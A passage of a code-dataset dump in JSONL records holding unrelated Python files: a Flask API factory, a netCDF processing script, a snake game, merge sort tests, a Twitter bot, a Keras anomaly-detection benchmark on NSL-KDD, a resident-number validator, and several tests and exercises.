request.headers.get(\"X-Consumer-Custom-Id\"),\n \"groups\": \",\".join(set(groups)),\n }\n\n\ndef create_app():\n \"\"\"create flask app\"\"\"\n app = Flask(__name__)\n app.config.from_pyfile(\"config.py\", silent=True)\n logger.warning(\"database: \" + app.config[\"MPCONTRIBS_DB\"])\n app.config[\"USTS\"] = URLSafeTimedSerializer(app.secret_key)\n app.jinja_env.globals[\"get_resource_as_string\"] = get_resource_as_string\n app.jinja_env.lstrip_blocks = True\n app.jinja_env.trim_blocks = True\n DEBUG = app.config.get(\"DEBUG\")\n\n if DEBUG:\n from flask_cors import CORS\n\n CORS(app) # enable for development (allow localhost)\n\n Compress(app)\n Logging(app)\n Marshmallow(app)\n MongoEngine(app)\n Swagger(app, template=app.config.get(\"TEMPLATE\"))\n setattr(app, \"kernels\", get_kernels())\n\n # NOTE: hard-code to avoid pre-generating for new deployment\n # collections = get_collections(db)\n collections = [\n \"projects\",\n \"contributions\",\n \"tables\",\n \"structures\",\n \"notebooks\",\n ]\n\n for collection in collections:\n module_path = \".\".join([\"mpcontribs\", \"api\", collection, \"views\"])\n try:\n module = import_module(module_path)\n except ModuleNotFoundError as ex:\n logger.warning(f\"API module {module_path}: {ex}\")\n continue\n\n try:\n blueprint = getattr(module, collection)\n app.register_blueprint(blueprint, url_prefix=\"/\" + collection)\n klass = getattr(module, collection.capitalize() + \"View\")\n register_class(app, klass, name=collection)\n logger.warning(f\"{collection} registered\")\n except AttributeError as ex:\n logger.warning(f\"Failed to register {module_path}: {collection} {ex}\")\n\n ## TODO discover user-contributed views automatically\n ## TODO revive redox_thermo_csp again\n ## TODO only load for main deployment\n # collection = \"redox_thermo_csp\"\n # module_path = \".\".join([\"mpcontribs\", \"api\", collection, \"views\"])\n # try:\n # module = import_module(module_path)\n # blueprint = getattr(module, collection)\n # app.register_blueprint(blueprint, url_prefix=\"/\" + collection)\n # logger.warning(f\"{collection} registered\")\n # except ModuleNotFoundError as ex:\n # logger.warning(f\"API module {module_path}: {ex}\")\n\n def healthcheck():\n if not DEBUG and not app.kernels:\n return \"KERNEL GATEWAY NOT AVAILABLE\", 500\n\n return \"OK\"\n\n app.register_blueprint(sse, url_prefix=\"/stream\")\n app.add_url_rule(\"/healthcheck\", view_func=healthcheck)\n logger.warning(\"app created.\")\n return app\n","sub_path":"mpcontribs-api/mpcontribs/api/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"524893232","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 10 14:48:17 2018\n\n@author: pnolan86\n\"\"\"\n\nfrom os import listdir\nfrom netCDF4 import Dataset\nimport numpy as np\nfiles = listdir('wrf_les/')\nxdim = 1008\nydim = 882\nzdim = 20\nheight_level = 1\ntime = np.empty([len(files)])\nu = np.empty([len(files),ydim,xdim])\nv = np.empty([len(files),ydim,xdim])\n\ntt=0\nprint(tt)\nncfile='wrf_les/'+files[tt]\nroot = Dataset(ncfile,'r') #read the data\nvars = root.variables #dictionary, all variables in dataset\nx = vars['x0'][:]*1000\ny = vars['y0'][:]*1000\nz = vars['z1'][:]*1000\nlon = vars['lon0'][:]\nlat = vars['lat0'][:]\nproj_center_lon = getattr(vars['grid_mapping_0'],'longitude_of_projection_origin')\nproj_center_lat = 
getattr(vars['grid_mapping_0'],'latitude_of_projection_origin')\ntime[tt] = vars['time'][:]\nu[tt,:,:] = vars['UGRD_HTGL'][0,height_level,:,:].squeeze()\nv[tt,:,:] = vars['VGRD_HTGL'][0,height_level,:,:].squeeze()\n\nfor tt in range(1,len(files)):\n print(tt)\n ncfile='wrf_les/'+files[tt]\n root = Dataset(ncfile,'r') #read the data\n vars = root.variables #dictionary, all variables in dataset\n time[tt] = vars['time'][:]\n u[tt,:,:] = vars['UGRD_HTGL'][0,height_level,:,:].squeeze()\n v[tt,:,:] = vars['VGRD_HTGL'][0,height_level,:,:].squeeze()\n\n \nprint('save')\nnp.savez('wrf_les_4_animation'+str(height_level)+'.npz',time=time,x=x,y=y,lon=lon,lat=lat,proj_center_lon=proj_center_lon,proj_center_lat=proj_center_lat,u=u,v=v) \n","sub_path":"7-17/process_wrf_data_4_animation.py","file_name":"process_wrf_data_4_animation.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261578952","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('', views.base_todo, name='base_todo'),\n path('notification',views.index_todo,name='notification'),\n path('calender',views.calender,name='calender'),\n path('add', views.addTodo, name='add'),\n path('complete/', views.completeTodo, name='complete'),\n path('deletecomplete', views.deleteCompleted, name='deletecomplete'),\n path('deleteall', views.deleteAll, name='deleteall'),\n]\n","sub_path":"learning_user/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"7645407","text":"import pygame\r\nimport sys\t\t# These are IMPORT-ant!\r\nimport random\t# \t ;D\r\nimport time\r\n\r\nclass snake():\r\n\tdef __init__(self):\r\n\t\tself.position = [50, 50]\t# Starts the snake in the top left corner\r\n\t\tself.body = [[50, 50], [40, 50]]\t#Starts the first body segments to the left of the snake's \"head\"\r\n\t\tself.direction = \"right\"\t#Starts the snake out moving to the right\r\n\t\tself.changeDirection = self.direction\r\n\r\n\tdef move(self, foodPosition):\t# Basic up, down, left, and right movement, as well as adding more body segments\r\n\t\tif self.direction == \"up\":\r\n\t\t\tself.position[1] -= 10\r\n\t\tif self.direction == \"down\":\r\n\t\t\tself.position[1] += 10\r\n\t\tif self.direction == \"left\":\r\n\t\t\tself.position[0] -= 10\r\n\t\tif self.direction == \"right\":\r\n\t\t\tself.position[0] += 10\r\n\t\tself.body.insert(0, self.position[:])\r\n\t\tif self.position == foodPosition:\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tself.body.pop()\r\n\t\t\treturn False\r\n\r\n\tdef turn(self, dir):\t# Lets the player change movement direction, but disallows re-tracing the snake's trail\r\n\t\tif dir == \"up\" and not self.direction == \"down\":\r\n\t\t\tself.direction = \"up\"\r\n\t\tif dir == \"down\" and not self.direction == \"up\":\r\n\t\t\tself.direction = \"down\"\r\n\t\tif dir == \"left\" and not self.direction == \"right\":\r\n\t\t\tself.direction = \"left\"\r\n\t\tif dir == \"right\" and not self.direction == \"left\":\r\n\t\t\tself.direction = \"right\"\r\n\r\n\tdef collision(self):\t# Checks if the player's snake has collided with the outer walls\r\n\t\tif self.position[0] > 790 or self.position[0] < 0:\r\n\t\t\treturn True\r\n\t\telif self.position[1] > 790 or self.position[1] < 0:\r\n\t\t\treturn True\r\n\t\tfor bodyPart in self.body[1:]:\r\n\t\t\tif self.position == bodyPart:\r\n\t\t\t\treturn 
True\r\n\t\treturn False\r\n\r\n\tdef snakeBody(self):\r\n\t\treturn self.body\r\n\r\nclass foodSpawner():\t# Random initial food piece spawn location\r\n\tdef __init__(self):\r\n\t\tself.position = [random.randrange(1, 70) * 10, random.randrange(1, 70) * 10]\r\n\t\tself.isFoodInWindow = True\r\n\r\n\tdef spawnFood(self):\t# Random food piece spawn location for the rest of the food pieces\r\n\t\tif self.isFoodInWindow == False:\r\n\t\t\tself.position = [random.randrange(1, 70) * 10, random.randrange(1, 70) * 10]\r\n\t\t\tself.isFoodInWindow = True\r\n\t\treturn self.position\r\n\r\n\tdef foodInWindow(self, a):\r\n\t\tself.isFoodInWindow = a\r\n\r\ndef close():\t# Exits the game\r\n\tpygame.quit()\r\n\tsys.exit()\r\n\r\ngame_window = pygame.display.set_mode((800, 800))\t# Game window size\r\nfps = pygame.time.Clock()\r\nscore = 0\r\nplayer = snake()\t# Calls the snake class\r\nspawnFood = foodSpawner()\t# Calls the food spawner class\r\n\r\nwhile True:\t\t# Checks what keys are being pressed, if the player has collected a food piece, draws snake and food, and sets \r\n\tfor event in pygame.event.get():\r\n\t\tif event.type == pygame.QUIT:\r\n\t\t\tclose();\r\n\t\telif event.type == pygame.KEYDOWN:\r\n\t\t\tif event.key == pygame.K_ESCAPE:\r\n\t\t\t\tclose();\r\n\t\t\tif event.key == pygame.K_UP:\r\n\t\t\t\tplayer.turn(\"up\")\r\n\t\t\tif event.key == pygame.K_DOWN:\r\n\t\t\t\tplayer.turn(\"down\")\r\n\t\t\tif event.key == pygame.K_LEFT:\r\n\t\t\t\tplayer.turn(\"left\")\r\n\t\t\tif event.key == pygame.K_RIGHT:\r\n\t\t\t\tplayer.turn(\"right\")\r\n\tfoodPosition = spawnFood.spawnFood()\r\n\tif player.move(foodPosition) == 1:\r\n\t\tscore += 1\r\n\t\tspawnFood.foodInWindow(False)\r\n\r\n\tgame_window.fill(pygame.Color(183, 255, 241))\t# Fills game window in with specified color\r\n\tfor position in player.snakeBody():\r\n\t\tpygame.draw.rect(game_window, pygame.Color(53, 135, 186), pygame.Rect(position[0], position[1], 10, 10))\t# Draws the player's snake\r\n\tpygame.draw.rect(game_window, pygame.Color(163, 124, 255), pygame.Rect(foodPosition[0], foodPosition[1], 10, 10))\t\t# Draws the food pieces\r\n\tif player.collision() == 1:\t\t# If the player collides with an outer wall, the game will close (player loses)\r\n\t\tclose();\r\n\tpygame.display.set_caption(\"<~> SERPENTES <~> YOUR SCORE: \" + str(score) + \" <~>\")\t# Sets game window title to show play score and game title\r\n\tpygame.display.flip()\t# Refreshes/updates the game window\r\n\tfps.tick(30)\t# Sets tick rate (fps)\r\n","sub_path":"serpentesGame.py","file_name":"serpentesGame.py","file_ext":"py","file_size_in_byte":3945,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"528527801","text":"def merge_sort(list_to_sort):\n if len(list_to_sort) <= 1:\n return list_to_sort\n\n diving_point = len(list_to_sort) // 2\n first_part = merge_sort(list_to_sort[:diving_point])\n second_part = merge_sort(list_to_sort[diving_point:])\n\n sorted_list = []\n i = 0\n j = 0\n while first_part or second_part:\n if first_part[i] > second_part[j]:\n sorted_list.append(second_part.pop(j))\n else:\n sorted_list.append(first_part.pop(i))\n\n if not first_part or not second_part:\n sorted_list.extend(first_part or second_part)\n break\n return sorted_list\n\n\ndef test_merge_sort():\n assert merge_sort([38, 27, 43, 3, 9, 82, 10]) == [3, 9, 10, 27, 38, 43, 82]\n\n\ndef test_merge_sort_on_empty_list():\n assert merge_sort([]) == []\n\n\ndef test_merge_sort_on_one_item_list():\n assert merge_sort([1]) == 
[1]\n\n\ndef test_merge_sort_on_two_item_list():\n assert merge_sort([2, 1]) == [1, 2]\n\n\ndef test_merge_sort_on_random_numbers():\n import random\n list_to_sort = random.sample(range(1, 100), 99)\n assert merge_sort(list_to_sort) == sorted(list_to_sort)\n","sub_path":"merge_sort/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"544573424","text":"\n# -*- coding: utf-8 -*-\n\n\nimport tweepy, time, sys, random\n\n#argfile = str(sys.argv[1])\n\nCONSUMER_KEY = ''\nCONSUMER_SECRET = ''\n\nACCESS_KEY = ''\nACCESS_SECRET = ''\n\n\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nif ACCESS_KEY:\n \n auth.set_access_token(ACCESS_KEY, ACCESS_SECRET) #used for access keys\n api = tweepy.API(auth)\n\nelse: ##This block will send the user to an auth link and ask to verify\n ##Authenication dance for users\n try:\n redirect_url = auth.get_authorization_url()\n except tweepy.TweepError:\n print(\"Error! Failed to get request token.\")\n\n #session.set('request_token', auth.request_token)\n\n print(redirect_url)\n\n verifier = input('Verifier: ') #prompts the user to enter verification code\n\n #token = session.get('request_token')\n #session.delete('request_token')\n #auth.request_token = token\n\n #auth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\n try:\n auth.get_access_token(verifier)\n except tweepy.TweepError:\n print(\"Error! Failed to get access token.\")\n\n #auth.set_access_token(key, secret)\n\n print(\"Access Token: \" + auth.access_token)\n print(\"Access Token Secret: \" + auth.access_token_secret)\n\n api = tweepy.API(auth)\n\n#api.update_status(status='Firing up')\n\nwhile True:\n random.seed()\n num = random.randint(1, 10)\n if num == 3:\n api.update_status(status='3!!!!!!!')\n #print(\"3!!!!!!!\")\n else:\n api.update_status(status=num)\n #print(num)\n time.sleep(60)\n\n\n\n\n\n\n\n\n\"\"\"\napi = tweepy.API(auth)\n\nfilename = open(argfile, 'r')\nf = filename.readlines()\nfilename.close()\n\nfor line in f:\n api.update_status(status = line)\n time.sleep(900) #tweet every fifteen minutes\n \"\"\"\n\n\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"500912115","text":"import keras.preprocessing.text as kt\nimport numpy as np\nimport random\nimport argparse\nfrom keras.models import model_from_json, Model\nfrom keras.models import Sequential\nfrom keras.layers.core import Dense, Dropout, Activation, Flatten\nfrom keras.optimizers import Adam\nimport tensorflow as tf\nimport json\nimport datamodule\nfrom ReplayBuffer import ReplayBuffer\nfrom ActorNetwork import ActorNetwork\nfrom CriticNetwork import CriticNetwork\nfrom OU import OU\nimport timeit\nfrom sklearn.preprocessing import normalize\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport math\nfrom keras.initializers import normal, identity, VarianceScaling\nfrom keras.models import model_from_json\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Flatten, Input, merge, Lambda\nfrom keras.optimizers import Adam\nfrom keras.layers.normalization import BatchNormalization\n\n# Tensorflow GPU optimization\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nfrom keras import backend as 
K\n\nK.set_session(sess)\n\n# same preprocessing routine of the reference\n\n# load NSL-KDD dataset\nDATA_PATH = '/home/tkdrlf9202/PycharmProjects/DDPG-Keras-AD'\ndata_train, data_test = datamodule.loader_all(DATA_PATH)\nidx_discrete = [1, 2, 3]\nidx_continuous = range(len(data_train[0]))\nidx_continuous = np.delete(idx_continuous, idx_discrete).tolist()\n\ndata_train_cont, data_train_disc, data_train_class = datamodule.preprocess(data_train, idx_continuous, idx_discrete)\ndata_test_cont, data_test_disc, data_test_class = datamodule.preprocess(data_test, idx_continuous, idx_discrete)\n\n# generate tokenizer, one per discrete column\nprint('tokenizing discrete features...')\ntokenizers = [kt.Tokenizer(num_words=1000) for i in range(len(idx_discrete))]\n\n# tokenize discrete columns\ndata_train_tokenized = datamodule.generate_tokens(tokenizers, data_train_disc)\nvocab_size = [min(len(tokenizers[i].word_index), tokenizers[i].num_words) for i in range(len(idx_discrete))]\nprint('vocab size of discrete features from training set : ' + str(vocab_size))\ndata_train_tokenized = np.array(data_train_tokenized, np.float32)\n\n# tokenize the test set based on the training set\ndata_test_tokenized = [tokenizers[i].texts_to_sequences(data_test_disc[:, i]) for i in range(len(idx_discrete))]\ndata_test_tokenized = np.array(data_test_tokenized).reshape(data_test_cont.shape[0], -1)\n\n# naive concat for tokenized values\n# needs embedding\ndata_train_x = np.concatenate((data_train_cont, data_train_tokenized), axis=1)\ndata_train_x = normalize(data_train_x, axis=0)\n\ndata_test_x = np.concatenate((data_test_cont, data_test_tokenized), axis=1)\ndata_test_x = normalize(data_test_x, axis=0)\n\ndata_train_y = []\nfor elem in data_train_class:\n if elem == 'normal':\n data_train_y.append(0.)\n else:\n data_train_y.append(1.)\n\ndata_test_y = []\nfor elem in data_test_class:\n if elem == 'normal':\n data_test_y.append(0.)\n else:\n data_test_y.append(1.)\n\nunique, counts = np.unique(data_train_y, return_counts=True)\nprint(dict(zip(unique, counts)))\nunique, counts = np.unique(data_test_y, return_counts=True)\nprint(dict(zip(unique, counts)))\n\n# split the train data for validation\ndata_train_x, data_valid_x, data_train_y, data_valid_y = train_test_split(data_train_x,\n data_train_y,\n test_size=0.2)\n\n#############################################\n\naction_dim = 1 # anomaly\nstate_dim = 41 # input dimension\nHIDDEN1_UNITS = 300\nHIDDEN2_UNITS = 600\nLRA = 0.0001\n\n\n# FF network with the same size of the actor network\n\nclass benchmark_FF():\n def __init__(self):\n S = Input(shape=[state_dim])\n h0 = Dense(HIDDEN1_UNITS, activation='relu')(S)\n h1 = Dense(HIDDEN2_UNITS, activation='relu')(h0)\n V = Dense(1, activation='sigmoid')(h1)\n model = Model(inputs=S, outputs=V)\n model.compile(Adam(LRA), loss='mse', metrics=['accuracy'])\n self.model = model\n\n\nbench_ff = benchmark_FF()\n\nlog_file = open('training_log_bench_33persemi.txt', 'w+')\nfor i in range(100):\n # shuffle the dataset\n feed = list(zip(data_train_x, data_train_y))\n random.shuffle(feed)\n data_train_x, data_train_y = zip(*feed)\n data_train_x = np.array(data_train_x)\n data_train_y = np.array(data_train_y)\n\n accuracy_train = []\n for j in range(data_train_x.shape[0]):\n if i == 0:\n if j >= 9999:\n # train with ground truth on every third step\n if j % 3 == 0:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n # train with pseudo-label on the remaining steps\n else:\n pred = bench_ff.model.predict_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]))\n pseudo_label = np.around(pred[0][0])\n acc = np.where(pseudo_label == data_train_y[j], 1., 0.)\n accuracy_train.append(acc)\n bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(pseudo_label, axis=0))\n else:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n else:\n # train with ground truth on every third step\n if j % 3 == 0:\n acc = bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(data_train_y[j], axis=0))\n accuracy_train.append(np.array(acc[1]))\n # train with pseudo-label on the remaining steps\n else:\n pred = bench_ff.model.predict_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]))\n pseudo_label = np.around(pred[0][0])\n acc = np.where(pseudo_label == data_train_y[j], 1., 0.)\n accuracy_train.append(acc)\n bench_ff.model.train_on_batch(data_train_x[j].reshape(1, data_train_x[j].shape[0]),\n np.expand_dims(pseudo_label, axis=0))\n\n accuracy_train = np.mean(np.array(accuracy_train))\n\n preds_val = []\n for j in range(data_valid_x.shape[0]):\n preds_val.append(bench_ff.model.predict(data_valid_x[j].reshape(1, data_valid_x[j].shape[0]))[0][0])\n preds_val_ = np.where(np.array(preds_val) >= 0.5, 1, 0)\n accuracy_val = accuracy_score(data_valid_y, preds_val_)\n print(\"epoch\", i, \": train accuracy\", accuracy_train, \", validation accuracy \", accuracy_val)\n\n # epoch (equiv. as episode) / training accuracy / validation accuracy\n log_string = str(i) + '\\t' + \\\n str(accuracy_train) + '\\t' + \\\n str(accuracy_val) + '\\n'\n log_file.write(log_string)\n\n","sub_path":"benchmark_1persemi.py","file_name":"benchmark_1persemi.py","file_ext":"py","file_size_in_byte":7329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"33545217","text":"\"\"\"Tests for deprecated MyBMWVehicle.\"\"\"\nimport pytest\nimport respx\n\nfrom bimmer_connected.const import CarBrands\nfrom bimmer_connected.vehicle.vehicle import ConnectedDriveVehicle\n\nfrom . 
import (\n VIN_F31,\n VIN_G01,\n VIN_G20,\n VIN_G26,\n VIN_G70,\n VIN_I01_NOREX,\n VIN_I01_REX,\n VIN_I20,\n get_deprecation_warning_count,\n)\nfrom .conftest import prepare_account_with_vehicles\n\nATTRIBUTE_MAPPING = {\n \"remainingFuel\": \"remaining_fuel\",\n \"position\": \"gps_position\",\n \"cbsData\": \"condition_based_services\",\n \"checkControlMessages\": \"check_control_messages\",\n \"doorLockState\": \"door_lock_state\",\n \"updateReason\": \"last_update_reason\",\n \"chargingLevelHv\": \"charging_level_hv\",\n \"chargingStatus\": \"charging_status\",\n \"maxRangeElectric\": \"max_range_electric\",\n \"remainingRangeElectric\": \"remaining_range_electric\",\n \"parkingLight\": \"parking_lights\",\n \"remainingRangeFuel\": \"remaining_range_fuel\",\n \"updateTime\": \"timestamp\",\n \"chargingTimeRemaining\": \"charging_time_remaining\",\n}\n\n\n@pytest.mark.asyncio\nasync def test_parsing_attributes(caplog, bmw_fixture: respx.Router):\n \"\"\"Test parsing different attributes of the vehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n for vehicle in account.vehicles:\n print(vehicle.name)\n assert vehicle.drive_train is not None\n assert vehicle.name is not None\n assert isinstance(vehicle.brand, CarBrands)\n assert vehicle.has_internal_combustion_engine is not None #\n assert vehicle.has_hv_battery is not None #\n assert vehicle.drive_train_attributes is not None\n assert vehicle.has_weekly_planner_service is not None #\n\n assert len(get_deprecation_warning_count(caplog)) == len(account.vehicles) * 3\n\n\n@pytest.mark.asyncio\nasync def test_drive_train_attributes(caplog, bmw_fixture: respx.Router):\n \"\"\"Test parsing different attributes of the vehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n vehicle_drivetrains = {\n VIN_F31: (True, False, False),\n VIN_G01: (True, True, False),\n VIN_G20: (True, False, False),\n VIN_G26: (False, True, False),\n VIN_G70: (False, True, False),\n VIN_I01_NOREX: (False, True, False),\n VIN_I01_REX: (True, True, False),\n VIN_I20: (False, True, False),\n }\n\n for vehicle in account.vehicles:\n assert vehicle_drivetrains[vehicle.vin][0] == vehicle.has_internal_combustion_engine\n assert vehicle_drivetrains[vehicle.vin][1] == vehicle.has_hv_battery\n assert vehicle_drivetrains[vehicle.vin][2] == vehicle.has_range_extender\n\n assert len(get_deprecation_warning_count(caplog)) == len(account.vehicles) * 3\n\n\n@pytest.mark.asyncio\nasync def test_deprecated_vehicle(caplog, bmw_fixture: respx.Router):\n \"\"\"Test deprecation warning for ConnectedDriveVehicle.\"\"\"\n account = await prepare_account_with_vehicles()\n\n deprecated_vehicle = ConnectedDriveVehicle(account, account.vehicles[0].data)\n\n assert deprecated_vehicle is not None\n assert len(get_deprecation_warning_count(caplog)) == 1\n","sub_path":"bimmer_connected/tests/test_deprecated_vehicle.py","file_name":"test_deprecated_vehicle.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"469811378","text":"'''\r\n학번: 2016116457\r\n이름: 박범진\r\n주민등록번호 정상 판별 프로그램\r\n'''\r\n\r\n\r\nclass CheckNum:\r\n def __init__(self, num):\r\n self.num = num\r\n\r\n def input_num(self):\r\n self.num = input(\"주민등록번호를 숫자만 입력하세요: \")\r\n if len(self.num) > 13:\r\n print(\"주민등록번호가 13자리 보다 큽니다. 다시 입력하세요.\")\r\n return False\r\n elif len(self.num) < 13:\r\n print(\"입력된 숫자의 자리수가 13자리 이하입니다. 
다시 입력하세요\")\r\n return False\r\n elif \"-\" in self.num:\r\n print(\"-를 빼고 다시 입력하세요.\")\r\n return False\r\n elif \" \" in self.num:\r\n print(\"공백 문자가 포함되었습니다. 다시 입력하세요.\")\r\n return False\r\n else:\r\n for item in self.num:\r\n if item.isalpha():\r\n print(\"알파벳 문자가 포함되었습니다. 다시 입력하세요.\")\r\n return False\r\n return True\r\n\r\n def distinguish(self):\r\n error_check = 2*int(self.num[0]) + 3*int(self.num[1]) + 4*int(self.num[2]) + 5*int(self.num[3])\\\r\n + 6*int(self.num[4]) + 7*int(self.num[5]) + 8*int(self.num[6]) + 9*int(self.num[7])\\\r\n + 2*int(self.num[8]) + 3*int(self.num[9]) + 4*int(self.num[10]) + 5*int(self.num[11])\r\n if int(self.num[12]) != (11 - error_check % 11) % 10:\r\n print(\"불법 생성된 주민등록번호입니다.\")\r\n return False\r\n return True\r\n\r\n def is_correct(self):\r\n print(\"정상적인 주민등록번호입니다.\")\r\n age = 2019 - int(\"19\" + self.num[0] + self.num[1])\r\n if age < 19:\r\n print(\"성인 인증이 실패하였습니다.\")\r\n return False\r\n local = int(self.num[7] + self.num[8])\r\n if 0 <= local <= 8:\r\n location = \"서울\"\r\n elif 9 <= local <= 12:\r\n location = \"부산\"\r\n elif 13 <= local <= 15:\r\n location = \"인천\"\r\n elif 16 <= local <= 25:\r\n location = \"경기\"\r\n elif 26 <= local <= 34:\r\n location = \"강원\"\r\n elif 35 <= local <= 47:\r\n location = \"충청\"\r\n elif 48 <= local <= 66:\r\n location = \"전라\"\r\n elif 67 <= local <= 91:\r\n location = \"경상\"\r\n elif 92 <= local <= 95:\r\n location = \"제주\"\r\n else:\r\n print(\"출생지 인증이 실패하였습니다.\")\r\n return False\r\n birth = \"\"\r\n for i in range(6):\r\n birth += self.num[i]\r\n print(\"성인 인증이 되었습니다. 나이\", age, \"세\")\r\n print(\"주민등록번호:\", self.num)\r\n print(\"생년월일:\", birth)\r\n print(\"출생지:\", location)\r\n\r\n\r\nmyNum = CheckNum(\"\")\r\nwhile True:\r\n if myNum.input_num():\r\n if myNum.distinguish():\r\n myNum.is_correct()\r\n break\r\n","sub_path":"Python_programming/check_number.py","file_name":"check_number.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"365216578","text":"import encode\nimport decode\n\n\nprint(\"{0:08b}\".format(127))\n\n\na = encode.Encode()\nencode_data = (a.network_interface(a.internet(a.transport(a.application('text', 'HTTP'), 'TCP')), 1))\n\nten_base = int(encode_data[0], base=2)\n\nprint(ten_base)\n\nb = decode.Decode()\ndata_from_network = b.network_interface (encode_data[0],1)\nprint ('network_interface level - ', data_from_network, len(data_from_network[0]))\ndata_ip = b.internet(data_from_network)\nprint ('internet level - ', data_ip, len(data_ip))\ndata_transport = b.transport (data_ip)\nprint ('transport level - ', data_transport, len(data_transport[0]))\ndata_app = b.application(data_transport)\nprint ('application level - ', data_app)\n","sub_path":"network/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"339596491","text":"#!/usr/bin/python\n\nfrom __future__ import print_function\n\nimport sys\nargs = sys.argv\n\n\n# string and digit\n\nstring = \"Welcome to Hitachi ID!\"\nprint(\"\\n\\nstring var contains:\", string)\n\ndigits = 5 \nprint(\"digits var contains:\", digits)\n\n# upper\n\nstring = string.upper()\nprint(\"\\nUpper:\", string)\n\n# join\n\nhello = \"Hello, world!\"\nwelcome = ' '.join([hello, string])\nprint(\"\\nUsing join:\", welcome)\n\n# slices\n\nslice_string = \"The quick brown fox jumped over the house while walking home\"\nslice_1 = 
slice_string[:9]\nslice_2 = slice_string[16:19]\nslice_3 = slice_string[-19:]\nslice_4 = slice_string[20:-25]\nslice_5 = slice_string[10:15]\nslice_6 = slice_string[-24:-19]\n\nprint(\"\\nOriginal string:\", slice_string)\nprint(\"Using slices:\", slice_1, slice_2, slice_3, slice_4, slice_5, slice_6)\n\n# format\n\nmonth = \"January\"\nstart_date = \"\\nFormat: %s. I started on %s %d\" % (welcome, month, digits)\nprint(start_date)\n\n# conditional (if args, elif condition)\n\nprint(\"\\nConditional...\\n\")\n\ncond = 10\n\nif(len(args) > 1):\n for i,word in enumerate(args):\n if i == 0:\n continue\n print(word)\nelif(cond != 10):\n print(\"Nothing to see here\")\nelse:\n print(welcome)\n \n","sub_path":"python/py_google-python-exercises/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"182609734","text":"class Solution(object):\n def moveZeroes(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: void Do not return anything, modify nums in-place instead.\n \"\"\"\n\n count = 0\n for n in nums:\n if n != 0:\n count += 1\n\n count2 = 0\n for i in range(len(nums)):\n if nums[i] != 0:\n nums[count2] = nums[i]\n count2 += 1\n\n for i in range(count, len(nums)):\n nums[i] = 0\n","sub_path":"Challenges/MoveZeros.py","file_name":"MoveZeros.py","file_ext":"py","file_size_in_byte":495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
{"seq_id":"415788647","text":"import copy\n\nfrom plenum.test.test_node import ensureElectionsDone\nfrom plenum.test.view_change.helper import add_new_node\n\nfrom plenum.test.helper import checkViewNoForNodes\nfrom plenum.test.pool_transactions.helper import demote_node\n\nnodeCount = 6\n\nold_commit = None\n\n\ndef test_future_primaries_replicas_increase(looper, txnPoolNodeSet, sdk_pool_handle,\n sdk_wallet_stewards, tdir, tconf, allPluginsPath):\n # Don't delete NodeStates, so we could check them.\n global old_commit\n old_commit = txnPoolNodeSet[0].write_manager.future_primary_handler.commit_batch\n for node in txnPoolNodeSet:\n node.write_manager.future_primary_handler.commit_batch = lambda three_pc_batch, prev_handler_result=None: 0\n\n initial_primaries = copy.copy(txnPoolNodeSet[0].primaries)\n last_ordered = txnPoolNodeSet[0].master_replica.last_ordered_3pc\n starting_view_number = checkViewNoForNodes(txnPoolNodeSet)\n\n # Increase replicas count\n add_new_node(looper, txnPoolNodeSet, sdk_pool_handle, sdk_wallet_stewards[0], tdir, tconf, allPluginsPath)\n\n new_view_no = checkViewNoForNodes(txnPoolNodeSet)\n assert new_view_no == starting_view_number + 1\n # \"seq_no + 2\" because 1 domain and 1 pool txn.\n state = txnPoolNodeSet[0].write_manager.future_primary_handler.node_states[-1]\n assert 